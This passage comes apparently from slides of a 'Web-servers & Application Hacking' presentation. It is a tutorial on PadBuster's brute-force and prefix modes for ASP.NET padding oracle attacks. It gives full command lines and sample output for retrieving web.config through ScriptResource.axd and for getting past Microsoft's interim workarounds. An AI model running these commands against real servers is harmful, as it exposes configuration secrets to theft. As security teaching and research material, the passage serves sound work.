the needed block with fairly reliable success. And the even better news is that
you’d be surprised at how quick it is to blindly brute force one of these values.
The approach taken by PadBuster is similar, but slightly different, than the
approach used by Web.config Bruter script released by Giorgio Fedon. I must
again credit James Martin for originally sharing his proof of concept exploit code
with me that leveraged this technique for identifying the first block. Instead of
random block values, however, PadBuster performs a sequential brute force
starting with all NULLS. The sequential brute force ensures that you never attempt
the same block value more than once and also allows you to resume the brute force
where you left off if the script gets killed (using the -resume option). The example
shown below assumes the payload from our Step 2 example above:

padBuster.pl
http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAA
AAAAAAAAA
AAAAAAAAAA1
iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -
encoding 3 -bruteforce -log
PadBuster's brute force mode works similar to the other modes of PadBuster,
where the first step is an automated response analysis. The main difference is that
rather than identifying a padding error, you want to identify an error that indicates
failure of the brute force attempt rather than success. In most cases, you may have
only one response to choose from...which is totally fine (unless one of the initial
256 fuzzing attempts produces a different response). In the case of
ScriptResource.axd, there’s a good chance you'll have more than one as shown
below.
INFO: Starting PadBuster Brute Force Mode
[+] Starting response analysis...

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 337 N/A
2 ** 255 404 1524 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended :
The reason for the 200 response included above is the T-Block. For our purposes,
we are not using the T-Block so we can select signature #2 (the 404). PadBuster
will continue issuing brute force attempts and notify you of every response that
does not match this signature. You'll likely get several T-Block hits similar to the
200 response shown above before you hit a block that returns the web.config as
shown below (this is just an excerpt from the output)
Attempt 4275 - Status: 200 - Content Length: 367
http://www.myapp.com/ScriptResource.axd?d=igA4AAAAAAAAAAAAAAAAA

A8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH -jVA0

Attempt 4561 - Status: 200 - Content Length: 360
http://www.myapp.com/ScriptResource.axd?d=4AA4AAAAAAAAAAAAAAAA
AA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9n sHoH-jVA0

Attempt 4792 - Status: 200 - Content Length: 100277
http://www.myapp.com/ScriptResource.axd?d=xwA5AAAAAAAAAAAAAAAA
AA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH -jVA0

Attempt 5353 - Status: 200 - Content Length: 359
http://www.myapp.com/ScriptResource.axd?d=BAA6AAAAAAAAAAAAAAAA
AA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH -jVA0
As you can imagine, it’s difficult to tell whether these responses contain anything
meaningful based solely on the data that is printed to the screen. In the case of this
exploit, we know that the web.config file is likely going to be much larger than the
small T-Block responses which average around 500 Bytes. You can actually see
that in the excerpt above, attempt number 4792 shows a much larger content
length...this is the response that contains the web.config file. The inclusion of
unwanted T-Block responses in our output is a result of our desire to maintain
PadBuster as a universal tool that is not specific to a particular vulnerability such
as this one.
You may also have noticed that our original command made use of another new
option (-log). The "log" option tells PadBuster to log various output files in an
automatically generated folder using the PadBuster.DDMMYY-TIME naming
convention. This option is critical for use in brute force mode, since each matching
response is logged to this folder and can be easily reviewed to determine whether
the brute force attempt worked. For the case of a web.config download exploit, I
recommend running the above command and monitoring the output folder to
determine when a significantly larger response file gets created.
Bypassing the Workarounds
Now that you've seen how to retrieve the web.config, let’s go back to an alternate
technique for using ScriptResource.axd as a padding oracle. As I mentioned
previously, this technique works despite implementing therecommended
workarounds initially presented by Microsoft in their guidance preceding the patch
release. To start, you'll need a valid ciphertext sample. The sample, however, does

not have to be valid for the script resource handler (it can be taken from any
Framework component...most easily from the WebResource.axd query string).
Step 1: Find a valid T-Block Request
Using the obtained sample, along with the -bruteforce option, the following
command can be used to quickly brute force a valid T-Block. The following
example assumes that we were able to obtain a valid "d" value from a link to the
web resource handler
(/WebResource.axd?d=qmZbysenet6VGS94Ord8gQ2&t=633768217780468750).
padBuster.pl
http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2
qmZbysene
t6VGS94Ord8gQ2 16 -encoding 3 -bruteforce
Once you run PadBuster with these options, and select the default error pattern,
you should get a 200 response within the first few hundred requests similar to the
one shown below:
Attempt 60 - Status: 200 - Content Length: 337
http://www.myapp.com/ScriptResource.axd?d=OwAAAAAAAAAAAAAAAAA
AAKpmW8rHp3relRkveDq3fIE1
Step 2: Use the obtained T-Block with the -prefix option
Now you can leverage the obtained T-Block request, along with the -prefix option,
to use the script resource handler as a padding oracle as shown below.
padBuster.pl
http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2
qmZbysene
t6VGS94Ord8gQ2 16 -encoding 3 -noiv -prefix
OwAAAAAAAAAAAAAAAAAAAKpmW8rHp3relRkveDq3fIE1
The examples above hopefully demonstrate how to use the new features of
PadBuster for performing various exploits against the .NET framework. Our plan
is to add more features to PadBuster where they make sense, specifically features
that can be useful in against a wide variety of padding oracle attack vectors. As
always, send us your feedback, modifications, bug reports, or general comments so
that we can incorporate them into future versions.

Web-servers & Application Hacking

About This Presentation

Slide Content

Tags

Categories

Download

Quick Actions

Statistics

Related Slideshows

Web-servers &amp; Application Hacking

About This Presentation

Slide Content

Slide 1

Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 11

Slide 12

Slide 13

Slide 14

Slide 15

Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32

Slide 33

Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Slide 39

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58

Slide 59

Slide 60

Slide 61

Slide 62

Slide 63

Slide 64

Slide 65

Slide 66

Slide 67

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

Slide 73

Slide 74

Slide 75

Slide 76

Slide 77

Slide 78

Web-servers & Application Hacking